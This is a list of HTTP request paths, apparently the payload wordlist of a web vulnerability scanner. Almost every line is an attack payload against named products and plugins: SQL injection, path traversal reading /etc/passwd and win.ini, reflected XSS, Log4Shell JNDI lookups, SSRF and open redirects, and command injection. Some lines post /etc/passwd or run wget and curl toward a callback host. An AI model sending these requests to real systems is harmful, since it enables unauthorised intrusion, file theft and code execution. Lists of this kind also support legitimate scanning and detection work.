/login.html
/Schemas/$%7B
/php/ping.php?hostname=|dir
/ui/vropspluginui/rest/services/getstatus
/users/sign_in
/wp-content/plugins/the-plus-addons-for-elementor-page-builder/readme.txt
/wp-content/themes/{{theme}}/style.css
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp1/home-18/?qtproxycall=https://oast.me
/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5(
/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0
/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;
/prweb/PRAuth/app/default/
/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live
/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css
/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css
/?url=http://0177.0.0.1/server-status
/?host=http://0177.0.0.1/server-status
/?file=http://0177.0.0.1/etc/passwd
/dl.asp
/mkDefault.asp?id={{mkdefault_id}}
/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0
/admin/elfinder/elfinder-cke.html
/assets/backend/elfinder/elfinder-cke.html
/assets/elFinder-2.1.9/elfinder.html
/assets/elFinder/elfinder.html
/backend/elfinder/elfinder-cke.html
/elfinder/elfinder-cke.html
/uploads/assets/backend/elfinder/elfinder-cke.html
/uploads/assets/backend/elfinder/elfinder.html
/uploads/elfinder/elfinder-cke.html
/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/service/v1/service-details
/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;
/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+md5({{num}}))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0
/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(md5({{num}})))))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0
/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/api/get_device_details
/openam/oauth2/..;/ccversion/Version
/oam/server/opensso/sessionservice
/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-
/?unix:{{repeat(
{{path}}
/about_state
/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/homeaction.php
/wan.htm
/RestAPI/ImportTechnicians
/goforms/menu
/Side.php
/lab.html?vpath=//interact.sh
/ddns_check.ccp
/login/cwp_theme/original/img/ico/favicon.ico
/login/design/img/ico/favicon.ico

/user/index.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd
/user/login.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd
/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}
/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}
/api/ping/;`id`
/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d
/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost
/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}
/user/error
/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D
/?__proto__%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&__proto__%5Bjquery%5D=x
/?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&constructor%5Bprototype%5D%5Bjquery%5D=x
/cache/backup/
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini
/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})
/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(
/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image
/wp-admin/admin-ajax.php
/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd
/docpicker/internal_proxy/http/oast.me
/wps/PA_WCM_Authoring_UI/proxy/http/oast.me
/agc/vicidial_mysqli_errors.txt
/password.html
/openam/ui/PWResetUserValidation
/OpenAM-11.0.0/ui/PWResetUserValidation
/ui/PWResetUserValidation
/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st
/index.asp
/../conf/config.properties
/AvalancheWeb/image?imageFilePath=C:/windows/win.ini
/pentaho/api/userrolelist/systemRoles?require-cfg.js
/api/userrolelist/systemRoles?require-cfg.js
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//
/?layout=/etc/passwd
/js/log.js
/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/file?valore=../../../../../windows/win.ini
/jeecg-boot/actuator/httptrace/
/jeecg-boot/sys/user/querySysUser?username=admin
/home/download
/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel
/processexecution/DownloadExcelFile/Process_Report_Excel
/processexecution/DownloadExcelFile/Infrastructure_Report_Excel
/processexecution/DownloadExcelFile/Resolver_Report_Excel
/api/snapshots/:key
/dashboard/snapshot/:key
/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd
/download/index.php?file=../../../../../../../../../etc/passwd
/conf/nginx.conf
/IND780/excalweb.dll?webpage=../../AutoCE.ini
/geoserver/
/files.md5
/testrail/files.md5
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/api/geojson?url=file:///etc/passwd
/api/geojson?url=file:///c://windows/win.ini
/.//WEB-INF/classes/META-INF/microprofile-config.properties
/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR
/action.php
/{{route}}
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
/asd/../../../../../../../../etc/passwd
/img/../../../../../../etc/passwd
/getCorsFile?urlPath=file:///etc/passwd
/getCorsFile?urlPath=file:///c://windows/win.ini
/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini
/public/plugins/alertlist/../../../../../conf/defaults.ini
/file/../../../../../../../../../../../../../../../../../..{{path}}
/;/WEB-INF/web.xml
/resin-doc/;/WEB-INF/resin-web.xml
/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0
/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
/apply.cgi
/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1
/auth/realms/master/clients-registrations/default
/auth/realms/master/clients-registrations/openid-connect
/realms/master/clients-registrations/default
/realms/master/clients-registrations/openid-connect
/cf_scripts/scripts/ajax/package/cfajax.js
/cf-scripts/scripts/ajax/package/cfajax.js
/CFIDE/scripts/ajax/package/cfajax.js
/cfide/scripts/ajax/package/cfajax.js
/CF_SFSD/scripts/ajax/package/cfajax.js
/cfide-scripts/ajax/package/cfajax.js
/cfmx/CFIDE/scripts/ajax/package/cfajax.js
/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E
/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E
/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22
/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22
/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22
/messages
/error3?msg=30&data=
/omni_success?cmdb_edit_path=\
/_bulk
/ads/www/delivery/lg.php?dest=http://interact.sh
/adserve/www/delivery/lg.php?dest=http://interact.sh
/adserver/www/delivery/lg.php?dest=http://interact.sh
/openx/www/delivery/lg.php?dest=http://interact.sh
/revive/www/delivery/lg.php?dest=http://interact.sh
/www/delivery/lg.php?dest=http://interact.sh
/loginLess/../../etc/passwd
/wp-content/plugins/jh-404-logger/readme.txt
/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh
/wp-login.php?login-error=<script>alert(document.domain)</script>
/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13
/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F
/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==
/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym
/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1
/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E 
/wp-content/themes/bello/readme.txt
/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D
/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/community/?foro=signin&redirect_to=https://interact.sh/
/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27
/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27
/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27
/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>
/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a
/wp-json/wp/v2/posts
/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;
/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh
/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh
/wp-content/plugins/elementor/assets/js/frontend.min.js
/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>
/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>
/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh
/?noptin_ns=email_click&to=https://interact.sh
/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh
/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>
/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh
/wp-json/wp/v2/posts?per_page=1
/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/
/s/{{randstr}}/_/;/WEB-INF/web.xml
/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E
/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1
/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>
/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module
/calendar/calendar_form.php/
/index.php?SQ=0&srch=x
/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/passwordreset?bundle=
/WEB-INF/web.xml
/%2e/WEB-INF/web.xml
/static?/%2557EB-INF/web.xml
/concat?/%2557EB-INF/web.xml
/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd
/ghost/preview
/Images/Remote?imageUrl=https://oast.me/
/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB
/new/newhttp://interact.sh
/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>
/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//
/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY
/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707
/pme/database/pme/phinx.yml
/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password
/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E
/mod/lti/auth.php?redirect_uri=javascript:alert(
/login?next=\\\interact.sh
/%2f/
/sample-apps/hello/%2f/
/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9
/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/
/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E
/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E
/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
//interact.sh/%2f..
/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1
/index.php?explorer/fileView&path=</script><script>alert(document.domain)</script>
/http_header.php
/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E
/te%3Cimg%20src=x%20onerror=alert(42)%3Est
/wp-json
/wp-json?
/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php
/vendor/phpfastcache/phpfastcache/examples/phpinfo.php
/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1
/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1
/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1
/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1
/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E
/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/ajax/telemetry.php
/glpi/ajax/telemetry.php
/wp-content/bps-backup/logs/db_backup_log.txt
/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt
/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh
/self.key
/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1
/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs
/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs
/auth/logout?continue=//interact.sh
/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E
/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E
/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp
/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x
/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F
/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%27%29%3Balert%28document%2Edomain%29%3B%2F%2F
/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>
/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login
/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)
/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1
/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=
